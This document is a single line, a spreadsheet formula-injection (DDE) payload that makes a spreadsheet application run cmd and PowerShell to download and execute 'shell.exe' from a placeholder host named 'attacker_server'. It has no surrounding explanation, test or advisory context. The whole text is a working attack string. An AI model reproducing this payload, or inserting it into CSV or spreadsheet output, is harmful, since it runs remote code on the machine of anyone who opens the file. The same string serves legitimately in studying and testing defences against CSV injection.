=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0